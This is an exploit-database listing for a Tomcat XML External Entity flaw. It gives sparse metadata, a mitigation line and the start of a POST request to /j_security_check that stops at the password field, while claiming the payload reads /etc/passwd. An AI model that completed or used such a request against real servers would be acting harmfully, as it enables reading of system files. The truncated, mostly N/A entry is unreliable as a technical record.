header-logo
Suggest Exploit
vendor:
Tomcat
by:
N/A
8.8
CVSS
HIGH
XML External Entity (XXE)
611
CWE
Product Name: Tomcat
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Tomcat XXE Vulnerability

Attackers can use readily available tools to exploit this issue. The example POST data is available which includes a malicious XML payload that can be used to read the /etc/passwd file.

Mitigation:

Disable external entity resolution and/or use a whitelist of allowed entities.
Source

Exploit-DB raw data:

Attackers can use readily available tools to exploit this issue.

The following example POST data is available:

POST /j_security_check HTTP/1.1
Host: www.example.com

j_username=tomcat&j_password=%

Navigation

Suggest Exploit

Services By CQR